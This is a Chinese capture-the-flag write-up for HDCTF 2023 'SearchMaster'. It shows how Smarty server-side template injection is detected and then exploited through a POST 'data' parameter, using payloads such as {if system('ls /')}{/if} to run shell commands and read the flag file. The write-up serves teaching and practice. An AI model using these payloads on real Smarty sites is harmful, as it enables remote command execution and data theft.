[HDCTF 2023]SearchMaster

[HDCTF 2023]SearchMaster wp

信息搜集

题目页面:

这里提到了模板,猜测是模板注入,提示 POST 发包,参数名为 data 。

测试 POST 传参 data=1 :

有返回。

模板注入

检查模板类型

这里用橙子科技的一张图,红色箭头代表失败后执行的下一步,绿色箭头代表成功后执行的下一步。

首先传入 ${7*7} ,若返回 49 ,则执行成功:

执行成功。

那么接下来传入 a{*123*}b ,若 {**} 内的内容被当成注释,仅返回 ab ,则执行成功:

执行成功,判定为 Smarty 模板。

Smarty 模板注入

Smarty 是 PHP 的一个模板。

推荐博客:Smarty模板注入&CVE-2017-1000480

查看版本号:

复制代码
{$smarty.version}

返回结果,版本 4.1.0 :

直接上 payload ,个人认为最好用的是 if 语句,if 代码块内可以执行任意 PHP 命令,不要加分号:

复制代码
{if system('ls /')}{/if}

返回结果:

查看 flag 文件:

复制代码
{if system('cat /flag_13_searchmaster')}{/if}

这条命令用 burp 发包成功了,用 hackerbar 发包却报错,有大佬知道原因吗?

用 hackerbar 发包:

用 burp 发包:

拿到 flag 。

相关推荐
Johny_Zhao9 小时前
阿里云平台健康检查巡检清单-运维篇
linux·网络安全·阿里云·信息安全·云计算·shell·系统运维
Y_0310 小时前
网络安全基础知识【6】
安全·web安全
一只鹿鹿鹿14 小时前
【制造】erp和mes系统建设方案(word)
大数据·人工智能·web安全·信息化·软件系统
轻抚酸~16 小时前
小迪23年-22~27——php简单回顾(2)
web安全·php
芯盾时代18 小时前
芯盾时代受邀出席安全可信数据要素交易流通利用研讨会
安全·网络安全·数据安全·芯盾时代
网安Ruler20 小时前
Web开发-PHP应用&原生语法&全局变量&数据接受&身份验证&变量覆盖&任意上传(代码审计案例)
网络·安全·网络安全·渗透·红队
雪兽软件1 天前
2025网络安全指南
安全·web安全
轻抚酸~1 天前
小迪23-28~31-js简单回顾
javascript·web安全
一只鹿鹿鹿1 天前
【网络安全】信息网络安全建设方案(WORD)
人工智能·安全·spring·web安全·低代码
JQLvopkk1 天前
Web安全学习步骤
网络安全